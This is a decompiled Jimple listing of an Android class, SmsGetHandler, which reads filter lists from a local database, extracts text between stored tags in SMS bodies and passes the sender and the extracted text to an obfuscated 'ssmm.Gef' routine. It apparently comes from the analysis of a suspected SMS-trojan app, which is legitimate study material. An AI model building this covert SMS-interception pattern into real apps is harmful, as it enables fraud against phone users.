public class com.xxx.yyy.SmsGetHandler extends java.lang.Object
{
    public static final java.lang.String DB_NAME;
    public static final int VERSION;
    public java.lang.String ReturnMsg;
    public java.lang.String[] Tags;
    private android.content.Context ctx;
    public java.util.List filterKeyList;
    public java.util.List filterMdnList;
    private com.xxx.yyy.SMSDatabaseHelper helper;

    public void <init>(android.content.Context)
    {
        com.xxx.yyy.SmsGetHandler r0;
        android.content.Context r1, $r3;
        com.xxx.yyy.SMSDatabaseHelper $r2, $r4, $r6, $r8;
        java.util.List $r5, $r7;
        java.lang.String[] $r9;

        r0 := @this: com.xxx.yyy.SmsGetHandler;
        r1 := @parameter0: android.content.Context;
        specialinvoke r0.<java.lang.Object: void <init>()>();
        r0.<com.xxx.yyy.SmsGetHandler: android.content.Context ctx> = r1;
        $r2 = new com.xxx.yyy.SMSDatabaseHelper;
        $r3 = r0.<com.xxx.yyy.SmsGetHandler: android.content.Context ctx>;
        specialinvoke $r2.<com.xxx.yyy.SMSDatabaseHelper: void <init>(android.content.Context,java.lang.String,android.database.sqlite.SQLiteDatabase$CursorFactory,int)>($r3, "css_db", null, 3);
        r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper> = $r2;
        $r4 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r5 = virtualinvoke $r4.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 0);
        r0.<com.xxx.yyy.SmsGetHandler: java.util.List filterMdnList> = $r5;
        $r6 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r7 = virtualinvoke $r6.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 1);
        r0.<com.xxx.yyy.SmsGetHandler: java.util.List filterKeyList> = $r7;
        $r8 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r9 = virtualinvoke $r8.<com.xxx.yyy.SMSDatabaseHelper: java.lang.String[] getBackContent()>();
        r0.<com.xxx.yyy.SmsGetHandler: java.lang.String[] Tags> = $r9;
        r0.<com.xxx.yyy.SmsGetHandler: java.lang.String ReturnMsg> = "y";
        return;
    }

    public boolean FindReturnMsg(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.SmsGetHandler r0;
        java.lang.String r1, r2, $r4, $r6, $r8, $r10, $r13, $r14;
        int i0, i1, i2, i3, i4, i5;
        java.lang.String[] $r3, $r5, $r7, $r9;
        com.xxx.yyy.ssmm $r11;
        android.content.Context $r12;

        r0 := @this: com.xxx.yyy.SmsGetHandler;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        i0 = virtualinvoke r2.<java.lang.String: int length()>();
        $r3 = r0.<com.xxx.yyy.SmsGetHandler: java.lang.String[] Tags>;
        $r4 = $r3[0];
        i1 = virtualinvoke $r4.<java.lang.String: int length()>();
        $r5 = r0.<com.xxx.yyy.SmsGetHandler: java.lang.String[] Tags>;
        $r6 = $r5[1];
        i2 = virtualinvoke $r6.<java.lang.String: int length()>();
        if i1 != 0 goto label0;

        if i2 != 0 goto label0;

        return 0;

     label0:
        i3 = 0;
        if i1 <= 0 goto label2;

        $r7 = r0.<com.xxx.yyy.SmsGetHandler: java.lang.String[] Tags>;
        $r8 = $r7[0];
        i4 = virtualinvoke r2.<java.lang.String: int indexOf(java.lang.String)>($r8);
        if i4 != -1 goto label1;

        return 0;

     label1:
        i3 = i4 + i1;

     label2:
        if i2 <= 0 goto label4;

        $r9 = r0.<com.xxx.yyy.SmsGetHandler: java.lang.String[] Tags>;
        $r10 = $r9[1];
        i5 = virtualinvoke r2.<java.lang.String: int indexOf(java.lang.String)>($r10);
        if i5 != -1 goto label3;

        return 0;

     label3:
        i0 = i5;

     label4:
        if i0 >= i3 goto label5;

        return 0;

     label5:
        if i0 != i3 goto label7;

        r0.<com.xxx.yyy.SmsGetHandler: java.lang.String ReturnMsg> = "y";

     label6:
        $r11 = new com.xxx.yyy.ssmm;
        specialinvoke $r11.<com.xxx.yyy.ssmm: void <init>()>();
        $r12 = r0.<com.xxx.yyy.SmsGetHandler: android.content.Context ctx>;
        $r13 = r0.<com.xxx.yyy.SmsGetHandler: java.lang.String ReturnMsg>;
        virtualinvoke $r11.<com.xxx.yyy.ssmm: void Gef(android.content.Context,java.lang.String,java.lang.String)>($r12, r1, $r13);
        return 1;

     label7:
        $r14 = virtualinvoke r2.<java.lang.String: java.lang.String substring(int,int)>(i3, i0);
        r0.<com.xxx.yyy.SmsGetHandler: java.lang.String ReturnMsg> = $r14;
        goto label6;
    }

    public void ReflashDb()
    {
        com.xxx.yyy.SmsGetHandler r0;
        com.xxx.yyy.SMSDatabaseHelper $r1, $r3;
        java.util.List $r2, $r4;

        r0 := @this: com.xxx.yyy.SmsGetHandler;
        $r1 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r2 = virtualinvoke $r1.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 0);
        r0.<com.xxx.yyy.SmsGetHandler: java.util.List filterMdnList> = $r2;
        $r3 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r4 = virtualinvoke $r3.<com.xxx.yyy.SMSDatabaseHelper: java.util.List getAll(int,int)>(0, 1);
        r0.<com.xxx.yyy.SmsGetHandler: java.util.List filterKeyList> = $r4;
        return;
    }

    public void setTags(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.SmsGetHandler r0;
        java.lang.String r1, r2;
        com.xxx.yyy.SMSDatabaseHelper $r3, $r4, $r5;
        java.lang.String[] $r6;

        r0 := @this: com.xxx.yyy.SmsGetHandler;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        $r3 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        virtualinvoke $r3.<com.xxx.yyy.SMSDatabaseHelper: int deleteBackRecord()>();
        $r4 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        virtualinvoke $r4.<com.xxx.yyy.SMSDatabaseHelper: int insertBackRecord(java.lang.String,java.lang.String)>(r1, r2);
        $r5 = r0.<com.xxx.yyy.SmsGetHandler: com.xxx.yyy.SMSDatabaseHelper helper>;
        $r6 = virtualinvoke $r5.<com.xxx.yyy.SMSDatabaseHelper: java.lang.String[] getBackContent()>();
        r0.<com.xxx.yyy.SmsGetHandler: java.lang.String[] Tags> = $r6;
        return;
    }
}
